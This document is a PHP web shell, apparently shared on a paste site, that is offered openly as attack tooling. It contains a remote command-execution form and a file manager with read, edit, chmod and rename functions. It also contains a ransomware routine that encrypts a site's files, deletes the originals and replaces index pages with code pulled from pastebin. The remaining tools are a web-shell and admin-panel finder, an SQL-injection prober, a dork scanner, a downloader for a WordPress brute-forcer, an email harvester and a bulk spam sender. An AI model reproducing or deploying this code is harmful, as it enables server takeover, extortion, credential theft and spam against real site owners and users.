· 7 years ago · Mar 28, 2018, 10:36 AM
1<? header('Content-Type: text/html; charset=utf-8'); ?>
2<link rel="shortcut icon" href="https://codeby.net/wp-content/uploads/2016/06/codeby_branding21-1.png" type="image/x-icon">
3<style type="text/css">
4 body{
5 background:black;
6 color: "#00ff7f";
7 }
8 #menu{
9 background:#000000;
10 margin:8px 2px 4px 2px;
11 font-family:Fredericka the Great;
12 font-size:14px;
13 color: red;
14 }
15
16 #search, #miner
17{
18 padding: 8px 9px;
19 width: 350px;
20 border: 1px solid #a4c3ca;
21 font: normal 13px 'trebuchet MS', arial, helvetica;
22 background: #f1f1f1;
23
24 -moz-border-radius: 50px 3px 3px 50px;
25 border-radius: 50px 3px 3px 50px;
26 -moz-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
27 -webkit-box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
28 box-shadow: 0 1px 3px rgba(0, 0, 0, 0.25) inset, 0 1px 0 rgba(255, 255, 255, 1);
29}
30
31
32#submit
33{
34 background: white;
35 background-image: -moz-linear-gradient(#000000, #000000);
36 background-image: -webkit-gradient(linear,left bottom,left top,color-stop(0, #000000),color-stop(1, #000000));
37
38 -moz-border-radius: 3px 50px 50px 3px;
39 border-radius: 1px 50px 50px 3px;
40
41 border-width: 1px;
42 border-style: solid;
43 border-color: #000000 #000000 #000000;
44
45 -moz-box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
46 -webkit-box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
47 box-shadow: 0 0 1px rgba(0, 0, 0, 0.3), 0 1px 0 rgba(255, 255, 255, 0.3) inset;
48
49 height: 35px;
50 margin: 0 0 0 10px;
51 padding: 0;
52 width: 90px;
53 cursor: pointer;
54 font: bold 14px Arial, Helvetica;
55 color: white;
56
57 text-shadow: 0 1px 0 rgba(255,255,255,0.5);
58}
59
60 a{
61 color: white;
62 text-decoration: none;
63 }
64
65 #menu a{
66 padding:3px 6px;
67 margin:1;
68 background:#000000;
69 text-decoration:none;
70 letter-spacing:2px;
71 -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
72 }
73 #menu a:hover{
74 background:black;
75 border-bottom:1px solid #ffffff;
76 border-top:1px solid #ffffff;
77 }
78
79</style>
80
81<body>
82
83<br/>
84<center>
85<pre style=' color: grey; font-size: 20px;'>
86_________ .___ ___. __
87\_ ___ \ ____ __| _/____\_ |__ ___.__. ____ _____/ |_
88/ \ \/ / _ \ / __ |/ __ \| __ < | | / \_/ __ \ __\
89\ \___( <_> ) /_/ \ ___/| \_\ \___ | | | \ ___/| |
90 \______ /\____/\____ |\___ >___ / ____| /\ |___| /\___ >__|
91 \/ \/ \/ \/\/ \/ \/ \/ </pre></center>
92
93
94
95<br><br><center>
96 <form id="searchbox" method="POST" action="">
97 <input id="search" type="text" name="shell" placeholder="Command shell">
98 <input id="submit" type="submit" name= "ok" value="Command">
99 </form>
100</center><br/>
101<br/><center><font color="white">Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686</font><br/><br/>
102
103<font color="blue"><? sysinfo(); ?></font></center></center>
104
105<?
106
107 echo "<font color='white'><br/><br/><center>PHP Version: ".phpversion().'<br/>';
108 echo $_SERVER['SERVER_NAME'].'<br/>';
109 echo $_SERVER['SERVER_SOFTWARE']."</center>";
110
111?>
112
113
114<br><br><center><div id="menu">
115<a href="?">Home</a> <font color=orange>*</font>
116<a href="?<?php echo "path=".$path; ?>&x=rans">Ransomware</a><font color=orange>*</font>
117<a href="?<?php echo "path=".$path; ?>&x=dorks">Dorks</a> <font color=orange>*</font>
118<a href="?<?php echo "path=".$path; ?>&x=grabc">Config Grabber</a> <font color=orange>*</font>
119<a href="?<?php echo "path=".$path; ?>&x=killer">IP Killer</a> <font color=orange>*</font>
120<a href="?<?php echo "path=".$path; ?>&x=whois">Intelligence Service</a> <font color=orange></font>
121<br><br>
122<a href="?<?php echo "path=".$path; ?>&x=word">Wordpress Scanner</a> <font color=orange>*</font>
123<a href="?<?php echo "path=".$path; ?>&x=sql">SQL-Injection</a> <font color=orange>*</font>
124<a href="?<?php echo "path=".$path; ?>&x=shell">Shell | Admin Finder</a> <font color=orange>*</font>
125<a href="?<?php echo "path=".$path; ?>&x=sherlock">Sherlock</a> <font color=orange>*</font>
126<a href="?<?php echo "path=".$path; ?>&x=krdp">Create RDP</a> <font color=orange>*</font>
127<a href="?<?php echo "path=".$path; ?>&x=spam">Spam Tool</a> <font color=orange>*</font>
128<a href="?<?php echo "path=".$path; ?>&x=about">About</a>
129</div></center>
130
131
132<?php
133
134set_time_limit(0);
135error_reporting(0);
136
137
138function sysinfo(){
139 echo '<font color="white">[#] '.$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "Safe Mode: <font color='green'>ON<br/></font>" : "Safe Mode: <font color='red'>OFF<br/></font>";
140 echo '[#] '.$ds = @ini_get("disable_functions");
141 echo $mysql = (function_exists('mysql_connect')) ? "MySQL: <font color='green'>ON</font> " : "MySql: <font color='red'> OFF</font> ";
142 echo ' [#] '.$curl = (function_exists('curl_version')) ? "CURL: <font color='green'>ON </font>" : "CURL: <font color='red'>OFF </font> ";
143 echo ' [#] '.$wget = (exe('wget --help')) ? "Wget: <font color='green'>ON<br/></font>" : "WGET: <font color='red'>OFF<br/></font> ";
144 echo ' [#] '.$perl = (exe('perl --help')) ? "Perl: <font color='green'>ON </font>" : "PERL: <font color='red'>OFF </font> ";
145 echo ' [#] '.$python = (exe('python --help')) ? "Python:<font color='green'> ON<br/></font>" : "Python: <font color='red'>OFF</font> ";
146}
147
148function exe($cmd) {
149 if(function_exists('system')) {
150 @ob_start();
151 @system($cmd);
152 $buff = @ob_get_contents();
153 @ob_end_clean();
154 return $buff;
155 } elseif(function_exists('exec')) {
156 @exec($cmd,$results);
157 $buff = "";
158 foreach($results as $result) {
159 $buff .= $result;
160 } return $buff;
161 } elseif(function_exists('passthru')) {
162 @ob_start();
163 @passthru($cmd);
164 $buff = @ob_get_contents();
165 @ob_end_clean();
166 return $buff;
167 } elseif(function_exists('shell_exec')) {
168 $buff = @shell_exec($cmd);
169 return $buff;
170 }
171}
172
173if(isset($_GET['path'])){
174$path = $_GET['path'];
175}else{
176$path = getcwd();
177}
178$path = str_replace('\\','/',$path);
179$paths = explode('/',$path);
180
181function perms($file){
182 $perms = fileperms($file);
183
184
185 if (($perms & 0xC000) == 0xC000) {
186 // Socket
187 $info = 's';
188 } elseif (($perms & 0xA000) == 0xA000) {
189 // Symbolic Link
190 $info = 'l';
191 } elseif (($perms & 0x8000) == 0x8000) {
192 // Regular
193 $info = '-';
194 } elseif (($perms & 0x6000) == 0x6000) {
195 // Block special
196 $info = 'b';
197 } elseif (($perms & 0x4000) == 0x4000) {
198 // Directory
199 $info = 'd';
200 } elseif (($perms & 0x2000) == 0x2000) {
201 // Character special
202 $info = 'c';
203 } elseif (($perms & 0x1000) == 0x1000) {
204 // FIFO pipe
205 $info = 'p';
206 } else {
207 // Unknown
208 $info = 'u';
209 }
210
211 // Owner
212 $info .= (($perms & 0x0100) ? 'r' : '-');
213 $info .= (($perms & 0x0080) ? 'w' : '-');
214 $info .= (($perms & 0x0040) ?
215 (($perms & 0x0800) ? 's' : 'x' ) :
216 (($perms & 0x0800) ? 'S' : '-'));
217
218 // Group
219 $info .= (($perms & 0x0020) ? 'r' : '-');
220 $info .= (($perms & 0x0010) ? 'w' : '-');
221 $info .= (($perms & 0x0008) ?
222 (($perms & 0x0400) ? 's' : 'x' ) :
223 (($perms & 0x0400) ? 'S' : '-'));
224
225 // World
226 $info .= (($perms & 0x0004) ? 'r' : '-');
227 $info .= (($perms & 0x0002) ? 'w' : '-');
228 $info .= (($perms & 0x0001) ?
229 (($perms & 0x0200) ? 't' : 'x' ) :
230 (($perms & 0x0200) ? 'T' : '-'));
231
232 return $info;
233 }
234
235 if(isset($_GET['filesrc'])){
236 echo "<center><br /><tr><td>You Are Looking : ";
237 echo $_GET['filesrc'];
238 echo '</tr></td></table>';
239 echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea></center>');
240 break;
241 }
242
243
244 elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
245 echo '</table><br /><br><center>'.$_POST['path'].'<br /><br />';
246 if($_POST['opt'] == 'chmod'){
247 if(isset($_POST['perm'])){
248 if(chmod($_POST['path'],$_POST['perm'])){
249 echo '<script>alert("Change Permission Sukses!");</script>';
250 }else{
251 echo '<script>alert("Change Permission Gagal!");</script>';
252 }
253 }
254 echo '<form method="POST">
255 Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
256 <input type="hidden" name="path" value="'.$_POST['path'].'">
257 <input type="hidden" name="opt" value="chmod">
258 <input class="bordergaya" type="submit" value="Go" />
259 </form>';
260 }elseif($_POST['opt'] == 'rename'){
261 if(isset($_POST['newname'])){
262 if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
263 echo '<script>alert("Change Name Sukses!");</script>';
264 }else{
265 echo '<script>alert("Change Name Gagal!");</script>';
266 }
267 $_POST['name'] = $_POST['newname'];
268 }
269 echo '<form method="POST">
270 New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
271 <input type="hidden" name="path" value="'.$_POST['path'].'">
272 <input type="hidden" name="opt" value="rename">
273 <input class="bordergaya" type="submit" value="Go" />
274 </form>';
275 }elseif($_POST['opt'] == 'edit'){
276 if(isset($_POST['src'])){
277 $fp = fopen($_POST['path'],'w');
278 if(fwrite($fp,$_POST['src'])){
279 echo '<script>alert("Edit File Sukses!");</script>';
280 }else{
281 echo '<script>alert("Edit File Gagal!");</script>';
282 }
283 fclose($fp);
284 }
285 echo '<form method="POST">
286 <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
287 <input type="hidden" name="path" value="'.$_POST['path'].'">
288 <input type="hidden" name="opt" value="edit">
289 <input class="bordergaya" type="submit" value="Go" />
290 </form>';
291 }
292 echo '</center>';
293 }
294 echo '</center>';
295 $scandir = scandir($path);
296 echo '<br/><br/><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
297 ';
298
299 foreach($scandir as $dir){
300 if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
301 echo "<tr>
302 <td><a style='color:white; font-family:Homenaje;' href=\"?path=$path/$dir\">$dir</a></td>
303 <td><center style='color:orange; font-family:Homenaje;'>--</center></td>
304 <td><center>";
305 if(is_writable("$path/$dir")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
306 elseif(!is_readable("$path/$dir")) echo "<font style='color:red; font-family:Homenaje;'>";
307 echo perms("$path/$dir");
308 if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
309
310 echo "</center></td>
311 <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
312 <select class='bordergaya' name=\"opt\">
313 <option value=\"\"></option>
314 <option value=\"chmod\">Chmod</option>
315 <option value=\"rename\">Rename</option>
316 </select>
317 <input type=\"hidden\" name=\"type\" value=\"dir\">
318 <input type=\"hidden\" name=\"name\" value=\"$dir\">
319 <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
320 <input class='bordergaya' type=\"submit\" value=\"Execute\" />
321 </form></center></td>
322 </tr>";
323 }
324 echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
325 foreach($scandir as $file){
326 if(!is_file("$path/$file")) continue;
327 $size = filesize("$path/$file")/1024;
328 $size = round($size,3);
329 if($size >= 1024){
330 $size = round($size/1024,2).' MB';
331 }else{
332 $size = $size.' KB';
333 }
334
335 echo "<tr>
336 <td><a style='color:white; font-family:Homenaje;' href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
337 <td><center style='color:orange; font-family:Homenaje;'>".$size."</center></td>
338 <td><center>";
339 if(is_writable("$path/$file")) echo "<font style='color:springgreen; font-family:Homenaje;'>";
340 elseif(!is_readable("$path/$file")) echo "<font style='color:red; font-family:Homenaje;'>";
341 echo perms("$path/$file");
342 if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
343 echo "</center></td>
344 <td width='26%'><center><form method=\"POST\" action=\"?option&path=$path\">
345 <select class='bordergaya' name=\"opt\">
346 <option value=\"\"></option>
347 <option value=\"chmod\">Chmod</option>
348 <option value=\"rename\">Rename</option>
349 <option value=\"edit\">Edit</option>
350 </select>
351 <input type=\"hidden\" name=\"type\" value=\"file\">
352 <input type=\"hidden\" name=\"name\" value=\"$file\">
353 <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
354 <input class='bordergaya' type=\"submit\" value=\"Execute\" />
355 </form></center></td>
356 </tr>";
357 }
358 echo '</table>
359 </div></font><font color="white">';
360
361
362
363if(isset($_GET['x']) && ($_GET['x'] == 'shell')) {
364
365 ?>
366 <font color="white"><br/><br/><center><h3>Shell | Admin Finder</h3></font>
367 <br/><form method = "POST">
368 <input type = "text" name = "url" placeholder="http://www.site.com/"/>
369 <select name="Finder">
370 <option value="Admin">Admin</option>
371 <option value="Shell">Shell</option>
372 </select>
373 <input type = "submit" name = "Submit" value = "Finder"/>
374 </form>
375
376 <?
377 $shells = array("/images/sa.php","wso.php", "dz.php","cpanel.php","cpn.php",'sql.php',"mysql.php","madspot.php",
378 "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
379 "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip","wp-content/plugins/disqus-comment-system/disqus.php",
380 "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
381 "wp-content/plugins/akismet/admin.php","wp-content/plugins/google-sitemap-generator/sitemap-core.php",
382 "wp-content/plugins/akismet/widget.php","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
383 "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
384 "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
385 "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
386 "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
387 "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
388 "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
389 "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
390 "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
391 "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/
392 data.sql","/wp.rar/","wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php","tmp/killer.php",
393 "/whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/","/tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","
394 dz1.php","forum.zip","Symlink.php","Symlink.pl","/forum.rar","/joomla.zip","/joomla.rar","/wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php","/spy.aspx","/xd.php","/tmp/xd.php","billing/killer.php","tmp/upload.php","tmp/admin.php","Server.php","tmp/uploads.php","tmp/
395 up.php","wp-admin/c99.php","tmp/priv8.php","priv8.php","/cgi.pl/","/tmp/cgi.pl","/downloads/dom.php","/templates/ja-helio-farsi/index.php","/
396 webadmin.html","/admins.php", "/wp-content/plugins/count-per-day/js/yc/d00.php");
397
398 $admin = array("admin","administrator","adm","login","loign.php","administrator.php","admins.php","logins","admincp","admincp.php","admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php","admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/","administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php","administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html","moderator/admin.php","moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php","adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp","administrator/login.asp","administrator/account.asp","administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp","moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html","administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php","ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php","webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/","admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/","panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/","utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/","login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/","hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/","banneradmin/","sshadmin/","phpldapadmin/","macadmin/","administratoraccounts/", "admin4_account/","admin4_colon/","radmind-1/","SuperAdmin/","AdminTools/","cmsadmin/","SysAdmin2/","globes_admin/","cadmins/","phpSQLiteAdmin/", "navSiteAdmin/","server_admin_small/","logo_sysadmin/","server/","database_administration/","power_user/", "system_administration/", "ss_vms_admin_sm/");
399 $url = $_POST['url'];
400 if(isset($_POST['Finder'])){
401 $course = $_POST['Finder'];
402 if($course == 'Shell'){ $find = $shells; } else { $find = $admin; }
403 }
404 foreach ($find as $shell){
405 $headers = get_headers($url.$shell);
406 if(stristr($headers[0],"200")){
407 echo "<center><a href='$url$shell'>$url$shell</a> Founded!</center><br /><br/><br/>";
408 }
409 }
410 }
411
412 elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')) {
413 ?>
414 <font color="#00ff7f"><br/><br/><center><h3>SQL Injection</h3></font>
415 <br/><form method="POST">
416 <textarea cols="40" rows="2" name="url"></textarea><br/><br/>
417 <input type="submit" name="sql" value="SQL">
418 </form>
419 <?php
420 $input = isset($_POST['url'])?$_POST['url']:"";
421 $ids = explode("\n", str_replace("\r", "", $input));
422 foreach ($ids as $target) {
423 echo $target;
424
425 if(isset($_POST['sql'])){
426 $req = file_get_contents($target."'");
427 if(stristr($req,"MySQL")){
428 echo "<br>SQL Found !<br/>";
429 for($i=1;$i<=500;$i++) { // Да, да 500, потом улучшу.
430 $un .= "{$i},";
431 $col = file_get_contents($target."+order+by+{$i}+--+");
432 if(stristr($col,"column ") or stristr($col, 'MySQL ')){
433 break;
434 }
435 }
436 echo "Column: ".$i.'<br/>';
437 $un = mb_substr($un, 0, -1);
438 echo $target.'+union+select+'.$un.'--<br/><br/>';
439 }
440 }
441 }
442 }
443
444 elseif(isset($_GET['x']) && ($_GET['x'] == 'rans')) {
445 ?> <form method="POST">
446 <font color="white"><br/><br/><center><h3>Rasnomware</h3></font>
447 <center><br/>
448 Dir:
449 <input type="text" name="direc" value=<?php echo $_SERVER['DOCUMENT_ROOT']; ?> ><br/><br/>
450 <font color='#6B8E23'>Mcrypt: </font><br/><br/>
451 Key:
452 <input type="text" name="key1" placeholder="ENC/DEC">
453 <select name="mcrdec">
454 <option value="encrypt">Encrypt</option>
455 <option value="decrypt">Decrypt</option>
456 </select>
457 <input type="submit" name="ok" class="b1" value="Enc/Dec">
458 </center><br/>
459 </form>
460 <br/><br/><form method='POST'>
461 <center>
462 Message:<br/><br/>
463 <textarea name="dor" rows=12></textarea><br/><br/>
464 <input type='submit' name='enter' value='Write'>
465 </center>
466 </form>
467 <?
468
469 function encrypt_decrypt($action, $string, $secret_key, $encrypt_method, $iv) {
470 $output = false;
471 $key = hash('sha256', $secret_key);
472 if( $action == 'encrypt' ) {
473 return base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
474 }
475 else if( $action == 'decrypt' ){
476 return openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
477 }
478 }
479
480function mcrypt($file){
481 if (strpos($file, '.htaccess') != false) return;
482 if (strpos($file, '.FS') != false) return;
483 if (strpos($file, 'Readme.html') != false) return;
484 if (strpos($file, 'rans') != false) return;
485 $code = file_get_contents('http://pastebin.com/raw/P5MskjcX');
486 if (strpos($file, 'index') != false) { file_put_contents($file, $code); return;}
487
488 $iv = mcrypt_create_iv(
489 mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
490 MCRYPT_DEV_URANDOM
491 );
492 $key = $_POST['key1'];
493 $encrypted = base64_encode( $iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv));
494 file_put_contents($file.'.FS', $encrypted);
495 unlink($file);
496}
497
498if(isset($_POST['enter'])){
499 $f = fopen("Readme.html", "w");
500 fwrite($f, $_POST['dor']);
501 fclose($f);
502}
503
504function z1($file){
505 if (strpos($file, '.htaccess') != false) return;
506 if (strpos($file, 'Readme.html') != false) return;
507 if (strpos($file, 'rans') != false) return;
508 $code = file_get_contents('http://pastebin.com/raw/P5MskjcX');
509 if (strpos($file, 'index') != false) { file_put_contents($file, $code); return;}
510 $iv = mcrypt_create_iv(
511 mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC),
512 MCRYPT_DEV_URANDOM
513 );
514 $key = $_POST['key1'];
515 $dec = mcrypt_decrypt(MCRYPT_RIJNDAEL_256, hash('sha256', $key, true), file_get_contents($file), MCRYPT_MODE_CBC, $iv);
516 $file = substr($file, 0, -3);
517 file_put_contents($file, $dec);
518 unlink($file.'.FS');
519}
520
521function encdir($dir, $func){
522 $j = 0;
523 $files = array_diff(scandir($dir), array('.', '..'));
524 foreach ($files as $filecip){
525 if(is_dir($dir.'\\'.$filecip)){
526 encdir($dir.'\\'.$filecip, $func);
527 }else{
528 $j++;
529 echo "Encrypted in the directory ".$j.' ';
530 $findme = 'z';
531 $findme1 = 'Y';
532 $pos1 = stripos($func, $findme);
533 $pos2 = stripos($func, $findme1);
534 if ($pos1 !== false){
535 echo "file: ".$dir."\\".$filecip." <font color='#6B8E23'>Decrypt!!!</font><br>";
536 }else{
537 echo "file: ".$dir."\\".$filecip." <font color='#800000'>Encrypt!!!</font><br>";
538 }
539 $func($dir.'/'.$filecip);
540 }
541 }
542}
543
544if(isset($_POST['ok'])){
545 echo '<center><font color="white">Website: '.$_SERVER['HTTP_HOST'].'<br/>';
546 echo 'Key: '.$_POST['key1'].'<br/>';
547 echo 'Method: Mcrypt</font></center><br/>';
548 if($_POST['mcrdec'] == 'encrypt') {
549 encdir($_POST['direc'], 'mcrypt');
550 }else if($_POST['mcrdec'] == 'decrypt'){
551 encdir($_POST['direc'] , 'z1');
552 }
553}
554}
555
556 elseif(isset($_GET['x']) && ($_GET['x'] == 'dorks')) {
557
558?>
559
560 <font color="white"><br/><br/><center><h3>Dorks</h3></font>
561<center><form method="POST">
562 Dorks:
563 <input type="text" name="dorks" placeholder="Dorks">
564 Page:
565 <input type="text" name="list" placeholder="List">
566 <input type="submit" name="go" value="Scanner">
567</form>
568<form method="POST">
569 Proxy Parser:<br/><br/>
570 <select name="Proxy">
571 <option value="1">http://proxyprivat.ru/freeproxies</option>
572 <option value="2">http://proxy.crushus.com/free-proxy-list.net</option>
573 </select>
574 <input type="submit" name="finders" value="Parser">
575 </form>
576</center>
577
578<?
579
580if(isset($_POST['finders'])){
581 $course = $_POST['Proxy'];
582 if($course == '1'){ $a = file_get_contents('http://proxyprivat.ru/freeproxies'); preg_match_all('#<tbody>(.+?)</tbody>#is', $a, $links); } else { $a = file_get_contents('http://proxy.crushus.com/free-proxy-list.net'); preg_match_all('#<div class="table-responsive">(.+?)</tbody>#is', $a, $links); }
583}
584
585foreach ($links[0] as $key) {
586 $dir = __DIR__;
587 file_put_contents($dir.'\proxy.php', "<? header('Content-Type: text/html; charset=utf-8'); ?><cener>".$key, FILE_APPEND);
588 ?>
589 <a href="proxy.php">Proxy</a>
590 <?
591}
592
593function curl($url) {
594 $curl = curl_init($url);
595 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
596 $content = curl_exec($curl);
597 curl_close($curl);
598 return $content;
599}
600
601
602$dork = $_POST['dorks'];
603$allLinks = array();
604$lll = array();
605for ($i=0; $i < $_POST['list']; $i++) {
606 $x = curl("http://www.bing.com/search?q=".$dork."&first=".$i);
607 if($x) {
608 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
609 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
610
611 }
612 }
613
614function injek($url) {
615 $data = curl(str_replace("=", "='", $url));
616 return preg_match("#{$errors}#i", $data);
617}
618
619foreach($allLinks as $url) {
620 $urls = parse_url($url, PHP_URL_HOST);
621 $urls = "http://$urls/";
622
623 $_SESSION[$urls] = "1";
624 if(injek($url)) {
625 echo "$url<br/>";
626
627 }
628 }
629}
630
631
632elseif (isset($_GET['x']) && ($_GET['x'] == 'word')) {
633 ?>
634 <font color="white"><br/><br/><center><h3>Wordpress scanner</h3></font>
635 <br/><form method = "POST">
636 <input type = "text" name = "url" placeholder="http://www.site.com/"/>
637 <input type = "submit" name = "Submit" value = "Finder"/>
638 </form>
639 <center><form method="POST">
640 <input type="submit" name="wordpress" value="Wordpress Brute">
641 </form></center>
642 <?
643 if(isset($_POST['wordpress'])){
644 $word = file_get_contents('http://pastebin.com/raw/iC5HXJB7');
645 file_put_contents($dir.'\wordpress.php', $word);
646 ?>
647 <a href="wordpress.php">Wordpress Brute</a>
648 <?
649 }
650 $shells = array("/robots.txt", "/info.php", "/.htaccess", "/wp-config.php.save", "/wp-config.txt");
651 foreach ($shells as $shell){
652 $headers = get_headers('$url$shell');
653 if(stristr($headers[0],"200")){
654 echo "<center><a href='$url$shell'>$url$shell</a> Founded!</center><br /><br/><br/>";
655 }
656 }
657}
658
659elseif (isset($_GET['x']) && ($_GET['x'] == 'spam')) {
660?>
661<center>
662 <font color="white"><br/><br/><center><h3>Spam Tool v 0.1</h3></font>
663
664 <form method="POST">
665 Email Dumper:<br/><br/>
666 <input type="text" name="dir">
667 <input type="submit" name="write" value="Dump"><br/><br/>
668 </form>
669 <form method="POST">
670 Email List:
671 <input type="text" name="List" placeholder="File Email List">
672 Subject:
673 <input type="text" name="subject" placeholder="Subject">
674 From:
675 <input type="text" name="from" placeholder="From">
676 <input type="submit" name="spam" value="Spam"><br/><br/>
677 Message<br/><br/>
678 <textarea cols=30 rows=20 name="message"></textarea>
679
680
681 </form>
682
683
684</center>
685
686<?
687function encdir($dir){
688 $j = 0;
689 $files = array_diff(scandir($dir), array('.', '..'));
690 foreach ($files as $filecip){
691 if(is_dir($dir.'\\'.$filecip)){
692 encdir($dir.'\\'.$filecip);
693 }else{
694 $j++;
695 $file = file($dir.'\\'.$filecip, FILE_IGNORE_NEW_LINES);
696 $file = array_filter($file,function($value){
697 return preg_match('/\'|@/',$value);
698 });
699 file_put_contents('email.txt',implode("\n",$file));
700 ?> <a href="email.txt">Email</a> <?
701 }
702 }
703}
704
705encdir($_POST['dir']);
706
707if(isset($_POST['spam'])){
708 $a = file_get_contents($_POST['List']);
709 $emails = explode ("\n",$a);
710 foreach ($emails as $to) {
711 $subject = $_POST['subject'];
712 $message = $_POST['message'];
713 $headers = 'From: '.$_POST['From']. "\r\n" .
714 'X-Mailer: PHP/' . phpversion();
715 mail($to, $subject, $message, $headers);
716 }
717}
718}
719
